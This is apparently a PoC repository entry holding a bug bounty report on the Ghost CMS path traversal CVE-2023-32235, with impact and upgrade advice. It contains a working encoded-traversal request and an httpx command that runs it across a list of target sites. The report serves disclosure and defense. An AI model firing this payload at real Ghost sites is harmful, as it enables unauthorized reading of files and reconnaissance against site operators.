POC details: 8b7649e0fb6683917cdfc620b2e9c93d94da2431

Source
Related vulnerability
Title: Ghost path traversal vulnerability (CVE-2023-32235)
Description: Ghost CMS is an open-source headless content management system (CMS) written in JavaScript, maintained by the Ghost Foundation (Singapore). Ghost versions before 5.42.1 contain a vulnerability in frontend/web/middleware/static-theme.js: by URL-encoding the path separators (`%2F`) of a traversal sequence so that it passes the theme static-file middleware's path check, an attacker can read arbitrary files inside the active theme folder.
Description
A directory traversal attack (also known as path traversal) aims to access files and directories stored outside the folder the application intends to serve.
Introduction
# Bug Bounty Report - Ghost Path Traversal (CVE-2023-32235)

## Summary
The Ghost application is vulnerable to a path traversal vulnerability, identified as CVE-2023-32235. By sending a request under `/assets/` whose `../` sequences have their slashes URL-encoded (`%2F`), an unauthenticated attacker can traverse out of the theme's `assets` directory and read arbitrary files within the active theme folder, for example the theme's `package.json`.

## Vulnerability Details
- **CVE ID:** CVE-2023-32235
- **Vulnerability Type:** Path Traversal
- **Affected Application:** Ghost
- **Affected Versions:** Ghost before 5.42.1 (fixed in 5.42.1)
- **Impact:** Unauthenticated read access to any file inside the active theme folder (templates, `package.json`, theme configuration), exposing theme internals and any sensitive data stored there.

## Proof of Concept (PoC)
The following request demonstrates the path traversal (`{{base-uri}}` is the target's base URL; `%2F` is a URL-encoded `/`, so the path decodes to `/assets/built/../../package.json`):
`{{base-uri}}/assets/built%2F..%2F..%2F/package.json`
A vulnerable instance answers with HTTP 200 and the JSON contents of the active theme's `package.json`.


## Steps to Reproduce
1. Prepare a target list `subs.txt` containing one base URL per line.
2. Run the following command to test the targets with the `httpx` tool (`-path` appends the payload to every URL, `-mc 200` keeps only responses with status 200):
   `httpx -l subs.txt -path "/assets/built%2F..%2F..%2F/package.json" -status-code -mc 200`
3. Inspect the matching responses. A 200 status alone is not proof: a host that returns 200 for unknown paths (catch-all routes, WAF block pages) will also match, so confirm that the response body is the JSON of a theme `package.json` (an object with `name` and `version` fields) before reporting the host as vulnerable.

## Impact
Successful exploitation gives an unauthenticated attacker read access to any file inside the active theme folder on the target server. This exposes theme templates and configuration, and any secrets a site operator has placed in theme files, and gives an attacker a detailed view of the installation to support further attacks. The traversal is confined to the theme folder; it does not by itself reach files elsewhere on the server.

## Recommendation
Upgrade to Ghost 5.42.1 or later, where the issue is fixed. For code that serves files from user-supplied paths in general: URL-decode and normalize the path once, before any allow-list or deny-list check, so that encoded separators (`%2F`) and `..` segments cannot slip past a check made on the raw path; apply the checks to the canonical path; and confine the resolved file to the directory that is meant to be served rather than relying on validation of the request string alone.

File snapshot

[4.0K] /data/pocs/8b7649e0fb6683917cdfc620b2e9c93d94da2431
├── [ 34K] LICENSE
└── [1.7K] README.md
0 directories, 2 files